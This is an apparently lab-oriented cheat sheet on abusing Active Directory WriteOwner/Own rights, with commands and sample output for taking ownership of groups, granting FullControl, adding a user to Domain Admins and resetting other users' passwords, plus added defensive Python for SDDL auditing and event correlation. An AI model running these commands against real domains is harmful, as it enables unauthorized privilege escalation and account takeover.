TLDRBins / WriteOwner/Own



Abuse #1 : Change Owner of the Group/User (From Linux)

1. Powerview.py

# Password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output: TO-DO

# NTLM
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -H '<HASH>'
Sample Output: TO-DO

2. Change Owner

# <USER> is the principal you control; it becomes the new owner of <TARGET_IDENTITY>
Set-DomainObjectOwner -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>'
Sample Output: TO-DO

Abuse #1 : Change Owner of the Group/User (From Windows)

1. Import PowerView

. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\maria> . .\PowerView.ps1

2. Change Owner

Set-DomainObjectOwner -Identity '<TARGET_IDENTITY>' -OwnerIdentity '<USER>'
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Set-DomainObjectOwner -Identity 'DOMAIN ADMINS' -OwnerIdentity 'maria'
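Changing the owner works because the owner of a directory object implicitly holds READ_CONTROL and WRITE_DAC, which is exactly what Abuse #2 step 1 relies on when it grants FullControl. The precondition for this page is therefore a principal that already owns the object or holds WriteOwner, WriteDacl or GenericAll on it, and that is what a defender audits for. The Python below is an added example (not TLDRBins code): it parses an object's SDDL security descriptor and reports which SIDs can take ownership, rewrite the DACL, hold full control or write the group's member attribute, then filters out the SIDs expected to have those rights. The descriptor, the domain SID S-1-5-21-1111-2222-3333 and the RIDs are constructed; the parser ignores ACE ordering, group nesting and property-scoped ACEs other than the member attribute, so it is a triage aid rather than a Windows access-check implementation.

```python
"""Audit who can take control of an AD object from its SDDL security descriptor.

Added example, not TLDRBins code. SAMPLE_SDDL below is CONSTRUCTED for a
hypothetical domain with SID S-1-5-21-1111-2222-3333.
"""
import re
from dataclasses import dataclass

# Access-mask bits for directory objects (MS-DTYP 2.4.3, MS-ADTS 5.1.3.2).
GENERIC_READ, GENERIC_WRITE, GENERIC_EXECUTE, GENERIC_ALL = 0x80000000, 0x40000000, 0x20000000, 0x10000000
WRITE_OWNER, WRITE_DAC, READ_CONTROL, DELETE = 0x80000, 0x40000, 0x20000, 0x10000
DS_CREATE_CHILD, DS_DELETE_CHILD, DS_LIST, DS_SELF = 0x1, 0x2, 0x4, 0x8
DS_READ_PROP, DS_WRITE_PROP, DS_DELETE_TREE, DS_LIST_OBJECT, DS_CONTROL_ACCESS = 0x10, 0x20, 0x40, 0x80, 0x100
ALL_CONTROL = DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER | 0x1FF   # 0x000F01FF, "FullControl"

SDDL_RIGHTS = {"GA": GENERIC_ALL, "GR": GENERIC_READ, "GW": GENERIC_WRITE, "GX": GENERIC_EXECUTE,
               "WO": WRITE_OWNER, "WD": WRITE_DAC, "RC": READ_CONTROL, "SD": DELETE,
               "CC": DS_CREATE_CHILD, "DC": DS_DELETE_CHILD, "LC": DS_LIST, "SW": DS_SELF,
               "RP": DS_READ_PROP, "WP": DS_WRITE_PROP, "DT": DS_DELETE_TREE,
               "LO": DS_LIST_OBJECT, "CR": DS_CONTROL_ACCESS}
# Generic rights expand to these specific masks on directory objects.
AD_GENERIC_MAPPING = {GENERIC_READ: 0x20094, GENERIC_WRITE: 0x20028,
                      GENERIC_EXECUTE: 0x20004, GENERIC_ALL: ALL_CONTROL}
# SDDL SID aliases that do not depend on the domain SID.
SID_ALIASES = {"SY": "S-1-5-18", "BA": "S-1-5-32-544", "AU": "S-1-5-11", "WD": "S-1-1-0"}
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"   # schema GUID of the 'member' attribute


@dataclass
class Ace:
    ace_type: str      # A, D, OA, OD, AU, ...
    flags: set         # CI, OI, IO, ID, ...
    mask: int
    object_type: str   # property / extended-right GUID for OA/OD ACEs, else ""
    sid: str


def parse_rights(text):
    """Rights field: '0x000f01ff' or a run of two-letter codes such as 'RCRPLCLO'."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        mask |= SDDL_RIGHTS[text[i:i + 2]]
    return mask


def expand_generic(mask):
    """Replace GA/GR/GW/GX bits with the specific rights they mean on an AD object."""
    for generic, specific in AD_GENERIC_MAPPING.items():
        if mask & generic:
            mask = (mask & ~generic) | specific
    return mask & 0xFFFFFFFF


def parse_sddl(sddl):
    """Return (owner SID, list of DACL Aces). The SACL is ignored."""
    owner = re.search(r"O:(S-[\d-]+|[A-Z]{2})", sddl)
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = []
    for raw in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        ace_type, flags, rights, obj_guid, _inherit_guid, trustee = raw.split(";")[:6]
        aces.append(Ace(ace_type, {flags[i:i + 2] for i in range(0, len(flags), 2)},
                        parse_rights(rights), obj_guid.lower(), SID_ALIASES.get(trustee, trustee)))
    owner_sid = SID_ALIASES.get(owner.group(1), owner.group(1)) if owner else None
    return owner_sid, aces


def control_rights(sddl):
    """Per-SID control rights on the object itself. No group expansion, no ACE ordering."""
    owner, aces = parse_sddl(sddl)
    obj = {"allow": {}, "deny": {}}       # object-level masks
    member = {"allow": {}, "deny": {}}    # masks scoped to the 'member' attribute
    for ace in aces:
        if ace.ace_type not in ("A", "D", "OA", "OD") or "IO" in ace.flags:
            continue   # audit ACEs and inherit-only ACEs do not apply to this object
        kind = "allow" if ace.ace_type in ("A", "OA") else "deny"
        mask = expand_generic(ace.mask)
        if ace.object_type == "":
            obj[kind][ace.sid] = obj[kind].get(ace.sid, 0) | mask
        elif ace.object_type == MEMBER_ATTR_GUID:
            member[kind][ace.sid] = member[kind].get(ace.sid, 0) | (mask & DS_WRITE_PROP)
        # ACEs scoped to any other property or extended right confer no control here.
    sids = set(obj["allow"]) | set(member["allow"]) | ({owner} if owner else set())
    result = {}
    for sid in sids:
        eff = obj["allow"].get(sid, 0) & ~obj["deny"].get(sid, 0)
        if sid == owner:
            eff |= READ_CONTROL | WRITE_DAC   # implicit owner rights: why Owns leads to WriteDacl
        members_eff = (eff | member["allow"].get(sid, 0)) & ~member["deny"].get(sid, 0)
        result[sid] = {"owner": sid == owner,
                       "write_owner": bool(eff & WRITE_OWNER),
                       "write_dacl": bool(eff & WRITE_DAC),
                       "full_control": (eff & ALL_CONTROL) == ALL_CONTROL,
                       "write_members": bool(members_eff & DS_WRITE_PROP)}
    return result


def audit(sddl, domain_sid, expected=("S-1-5-18", "S-1-5-32-544"), admin_rids=(512, 518, 519)):
    """SIDs that can take over the object but are not expected to: sorted [(sid, reasons)]."""
    trusted = set(expected) | {f"{domain_sid}-{rid}" for rid in admin_rids}
    findings = []
    for sid, rights in sorted(control_rights(sddl).items()):
        reasons = [k for k in ("owner", "write_owner", "write_dacl", "full_control", "write_members") if rights[k]]
        if reasons and sid not in trusted:
            findings.append((sid, reasons))
    return findings


# Constructed descriptor of a group: an ordinary user (RID 1105) owns it, RID 1106 holds
# WriteOwner, RID 1107 may write only the 'member' attribute, and an inherit-only ACE for
# RID 1108 must be ignored. SY, BA and Domain Admins (RID 512) are the expected controllers.
DOMAIN_SID = "S-1-5-21-1111-2222-3333"
SAMPLE_SDDL = (
    f"O:{DOMAIN_SID}-1105G:{DOMAIN_SID}-512"
    f"D:PAI(A;;0x000f01ff;;;{DOMAIN_SID}-512)(A;;GA;;;SY)(A;;GA;;;BA)"
    f"(A;;RCRPLCLO;;;AU)(A;;WO;;;{DOMAIN_SID}-1106)"
    f"(OA;;WP;{MEMBER_ATTR_GUID};;{DOMAIN_SID}-1107)(A;CIIO;GA;;;{DOMAIN_SID}-1108)"
)

if __name__ == "__main__":
    for sid, reasons in audit(SAMPLE_SDDL, DOMAIN_SID):
        print(f"{sid}: {', '.join(reasons)}")
```

Run against real descriptors by feeding the `nTSecurityDescriptor` of each privileged group (as SDDL) into `audit`; anything it returns is a principal that can perform Abuse #1 or #2 without being a member of an admin group, and is what BloodHound would draw as an Owns, WriteOwner, WriteDacl, GenericAll or AddMember edge.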


Abuse #2 : Add User to the Group (From Linux)

1. Add Full Control to the User Over the Group

# Password
sudo ntpdate -s <DC> && impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: TO-DO

# NTLM
sudo ntpdate -s <DC> && impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: TO-DO

# Kerberos
sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && impacket-dacledit -k 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip dc.absolute.htb -principal 'm.lovegod' -target 'NETWORK AUDIT' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240924-021507.bak
[*] DACL modified successfully!

# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: TO-DO

# NTLM (bloodyAD takes the hash through the same -p option as the password, as ':<HASH>')
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: TO-DO

# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k --host dc.absolute.htb add genericAll 'NETWORK AUDIT' 'm.lovegod'
[+] m.lovegod has now GenericAll on NETWORK AUDIT

# Password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output: TO-DO

# NTLM
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -H '<HASH>'
Sample Output: TO-DO

Add-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights fullcontrol
Sample Output: TO-DO

2. Add User to the Group

# Request a TGT
sudo ntpdate -s <DC> && impacket-getTGT '<DOMAIN>/<USER>'
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && impacket-getTGT 'absolute.htb/m.lovegod'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Saving ticket in m.lovegod.ccache

export KRB5CCNAME=<USER>.ccache
Sample Output:
$ export KRB5CCNAME=m.lovegod.ccache

sudo ntpdate -s <DC> && net rpc group addmem '<GROUP>' '<USER>' -U '<USER>' --use-kerberos=required -S <DC>
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && net rpc group addmem 'NETWORK AUDIT' 'm.lovegod' -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:

# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO

# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO

# Kerberos
bloodyAD -k -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -k -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' --host dc.absolute.htb add groupMember 'NETWORK AUDIT' 'm.lovegod'
[+] m.lovegod added to NETWORK AUDIT

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output: TO-DO

3. Check

sudo ntpdate -s <DC> && net rpc group members '<GROUP>' -U '<USER>' --use-kerberos=required -S <DC>
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && net rpc group members 'NETWORK AUDIT' -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:
absolute\m.lovegod
absolute\svc_audit

Get-DomainGroupMember -Identity '<GROUP>'
Sample Output: TO-DO

Abuse #2 : Add User to the Group (From Windows)

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\maria> . .\PowerView.ps1

2. Create a Cred Object (runas) [optional]

$username = '<DOMAIN>\<USER>'
Sample Output: TO-DO

$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output: TO-DO

$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $password
Sample Output: TO-DO

3. Add User to the Group

Add-DomainObjectAcl -TargetIdentity '<GROUP>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC> -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Add-DomainObjectAcl -TargetIdentity 'DOMAIN ADMINS' -PrincipalIdentity 'maria' -Rights All -DomainController jenkins.object.local

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>' -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

4. Check

Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> -Credential $cred | fl MemberName
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Get-DomainGroupMember -Identity 'DOMAIN ADMINS' -Domain object.local -DomainController jenkins.object.local | fl MemberName

MemberName : maria

MemberName : Administrator

# Or
net user <USER>
Sample Output:
*Evil-WinRM* PS C:\Users\maria> net user maria
User name                    maria
Full Name                    maria garcia
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 9:16:33 PM
Password expires             Never
Password changeable          10/22/2021 9:16:33 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/23/2024 2:24:00 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

# Exit current sessions or re-login
whoami /groups
Sample Output:
*Evil-WinRM* PS C:\Users\maria> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                           Attributes
============================================= ================ ============================================= ===============================================================
Everyone                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users               Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins                          Group            S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias            S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


Abuse #3 : Change Target User Password (From Linux)

bloodyAD -d <DOMAIN> -u <USER> -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
$ bloodyAD -d object.local -u oliver -p 'c1cdfun_d2434' --host jenkins.object.local set password smith 'Test1234'
[+] Password changed successfully!

Ref: bloodyAD

rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output:
$ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Test1234'

Abuse #3 : Change Target User Password (From Windows)

1. Import PowerView

. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a Cred Object (runas) [optional]

$username = '<DOMAIN>\<USER>'
Sample Output: TO-DO

$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output: TO-DO

$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $password
Sample Output: TO-DO

3. Change Target User Password

$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force

Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password
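Every step in Abuse #2 and Abuse #3 lands in the domain controller's Security log under a known event ID: the owner change and the DACL write are both directory-object modifications of the nTSecurityDescriptor attribute (5136, which needs the Directory Service Changes audit subcategory and a SACL on the object), adding a member to a security-enabled global or universal group is 4728 or 4756, and a password reset of another account is 4724. The Python below is an added example (not TLDRBins code) that correlates those events per acting account: a descriptor write on a group followed, within a window, by a member add to the same group (with a self-add flagged separately) and a password reset. The records are constructed to mirror the page's sample session (maria taking over Domain Admins); event IDs and field names follow the Windows Security schema, but every value, SID and timestamp is invented.

```python
"""Correlate Security events into the WriteOwner/WriteDacl -> AddMember -> reset chain.

Added example, not TLDRBins code. SAMPLE_EVENTS below are CONSTRUCTED; the
domain SID S-1-5-21-1111-2222-3333 and the RIDs are invented.
"""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators",
                     "schema admins", "account operators"}
WINDOW = timedelta(minutes=30)


def ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def cn(dn):
    """'CN=Domain Admins,CN=Users,DC=x,DC=y' -> 'Domain Admins'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_takeover_chains(events, window=WINDOW, admin_accounts=frozenset()):
    """One finding per (acting account, object) whose nTSecurityDescriptor was rewritten,
    listing which later stages of the chain the same account performed inside the window."""
    events = sorted(events, key=lambda e: e["TimeCreated"])
    by_subject = {}
    for ev in events:
        by_subject.setdefault(ev["SubjectUserSid"], []).append(ev)

    findings = []
    for subject_sid, evs in by_subject.items():
        subject = evs[0]["SubjectUserName"]
        if subject.lower() in admin_accounts:
            continue   # accounts expected to manage ACLs (keep this list short and reviewed)
        acl_writes = {}
        for e in evs:
            if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor":
                acl_writes.setdefault(e["ObjectDN"], []).append(e)
        for object_dn, writes in acl_writes.items():
            group = cn(object_dn)
            start = writes[0]["TimeCreated"]
            later = [e for e in evs if start <= e["TimeCreated"] <= start + window]
            stages = ["acl_write"]
            adds = [e for e in later if e["EventID"] in (4728, 4756)
                    and e["TargetUserName"].lower() == group.lower()]
            if adds:
                stages.append("member_added")
                if any(e["MemberSid"] == subject_sid for e in adds):
                    stages.append("self_added")     # the account added itself
            resets = [e for e in later if e["EventID"] == 4724]
            if resets:
                stages.append("password_reset")
            privileged = group.lower() in PRIVILEGED_GROUPS
            if privileged and "member_added" in stages:
                severity = "critical"
            elif privileged or len(stages) >= 3:
                severity = "high"
            else:
                severity = "medium"
            findings.append({"subject": subject, "object": group, "stages": stages,
                             "severity": severity, "descriptor_writes": len(writes),
                             "reset_targets": [e["TargetUserName"] for e in resets]})
    return findings


# Constructed records. Owner change and DACL write each produce a 5136 on nTSecurityDescriptor.
DOM = "S-1-5-21-1111-2222-3333"
MARIA, HELPDESK, BOB = f"{DOM}-1110", f"{DOM}-1120", f"{DOM}-1130"
DA_DN = "CN=Domain Admins,CN=Users,DC=object,DC=local"
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": ts("2024-09-23 02:20:11"), "SubjectUserName": "maria",
     "SubjectUserSid": MARIA, "ObjectDN": DA_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "TimeCreated": ts("2024-09-23 02:20:58"), "SubjectUserName": "maria",
     "SubjectUserSid": MARIA, "ObjectDN": DA_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4728, "TimeCreated": ts("2024-09-23 02:21:40"), "SubjectUserName": "maria",
     "SubjectUserSid": MARIA, "TargetUserName": "Domain Admins",
     "MemberName": "CN=maria garcia,CN=Users,DC=object,DC=local", "MemberSid": MARIA},
    {"EventID": 4724, "TimeCreated": ts("2024-09-23 02:23:05"), "SubjectUserName": "maria",
     "SubjectUserSid": MARIA, "TargetUserName": "smith"},
    # benign noise: helpdesk adds bob to a normal group with no preceding descriptor write
    {"EventID": 4728, "TimeCreated": ts("2024-09-23 02:22:00"), "SubjectUserName": "helpdesk",
     "SubjectUserSid": HELPDESK, "TargetUserName": "Sales",
     "MemberName": "CN=bob,CN=Users,DC=object,DC=local", "MemberSid": BOB},
    # benign noise: a 5136 on an attribute other than nTSecurityDescriptor
    {"EventID": 5136, "TimeCreated": ts("2024-09-23 02:25:00"), "SubjectUserName": "helpdesk",
     "SubjectUserSid": HELPDESK, "ObjectDN": "CN=Sales,CN=Users,DC=object,DC=local",
     "ObjectClass": "group", "AttributeLDAPDisplayName": "description"},
]

if __name__ == "__main__":
    for f in detect_takeover_chains(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['subject']} on {f['object']}: {' -> '.join(f['stages'])}")
```

In production the same logic sits on top of a SIEM query over the DC Security logs; the window and the admin allow-list are the two knobs to tune, and a lone 5136 on a privileged group's descriptor by a non-admin account is already worth a ticket even when no later stage follows.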